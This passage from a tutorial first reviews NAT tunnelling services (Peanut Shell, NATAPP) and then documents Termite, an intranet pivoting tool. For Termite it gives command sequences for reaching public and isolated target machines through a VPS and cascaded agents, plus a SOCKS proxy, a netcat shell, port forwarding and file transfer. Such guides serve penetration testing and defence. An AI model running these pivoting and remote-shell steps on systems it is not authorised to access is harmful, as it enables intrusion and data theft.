[Figure 11: Peanut Shell client]

Notes:

  • HTTP mappings require a one-off payment of 6 yuan for HTTP website verification
  • free accounts cannot use HTTPS mappings
  • free accounts are limited to 1 Mbit/s per mapping

3. NATAPP

Advantages:

  • up to two free tunnels
  • the management console shows the details of every request

Disadvantages:

  • the client has no graphical interface
  • free tunnels have their domain name changed without notice from time to time

Official site: https://natapp.cn/

Client download: https://natapp.cn/#

How to use:

  • Open the "purchase tunnel" page and buy a free tunnel.

[Figure 12: NATAPP tunnel purchase page]

[Figure 13: NATAPP free tunnel]

  • Open the tunnel configuration and set the local address and port.

[Figure 14: NATAPP tunnel configuration]

  • Look up the authtoken.

[Figure 15: NATAPP authtoken]

  • In a terminal run ./natapp -authtoken=<the authtoken looked up above>, then visit the link shown.

[Figure 16: NATAPP client output]

An intranet pivoting tool: Termite

Official site: https://rootkiter.com/Termite/ Official notes: http://rootkiter.com/Termite/README.txt GitHub: https://github.com/rootkiter/Binary-files

Download: https://github.com/ph-cwtcwt/IT-tool/tree/termite

Termite is an intranet pivoting tool consisting of a management end (admin) and an agent. It supports multiple platforms, forward and reverse cascading between pivot hosts, built-in shell management and more.

Admin parameters

[Figure 17: admin command-line parameters]

Agent parameters

[Figure 18: agent command-line parameters]

Commands available once admin is connected to an agent

[Figure 19: admin console commands]

Usage in different scenarios

1. The target is on the public internet

[Figure 20: direct connection to a public target]

Usage:

```text
(1) On target A:   agent_win32.exe -l 8888
(2) On your PC:    admin_win32.exe -c <target ip> -p 8888
```

2. The target is on an intranet but can reach the internet

[Figure 21: agent connecting back through a VPS]

Usage:

```text
(1) On the VPS:         agent_win32.exe -l 8888
(2) On your PC:         admin_win32.exe -c <vps_ip> -p 8888
(3) On the target:      agent_win32.exe -c <vps_ip> -p 8888
```

3. Target B is on an intranet with no internet access, but machine A on the same network can reach the internet

[Figure 22: cascading through machine A to target B]

(1) Agent forward connection

Usage:

```text
a. On the VPS:                  agent_win32.exe -l 8888
b. On your PC:                  admin_win32.exe -c <vps_ip> -p 8888
c. On machine A (has internet): agent_win32.exe -c <vps_ip> -p 8888
d. On target B:                 agent_win32.exe -l 9000
e. In the admin console:        goto <A_id> -> connect <B_ip> 9000
```

(2) Agent reverse connection

Usage:

```text
a. On the VPS:                  agent_win32.exe -l 8888
b. On your PC:                  admin_win32.exe -c <vps_ip> -p 8888
c. On machine A (has internet): agent_win32.exe -c <vps_ip> -p 8888
d. In the admin console:        goto <A_id> -> listen 9000
e. On target B:                 agent_win32.exe -c <A_ip> -p 9000
```

Commonly used functions

SOCKS proxy

Usage:

```text
(1) goto <agent id>
(2) socks 1080
```

Shell management

Usage:

```text
(1) shell 4444
(2) nc -v 127.0.0.1 4444
```

Port forwarding

Usage:

```text
lcxtran <local port> <target ip> <target port>
```

Uploading and downloading files

Usage:

```text
upfile <local file path> <remote path>
downfile <remote file path> <local destination path>
```
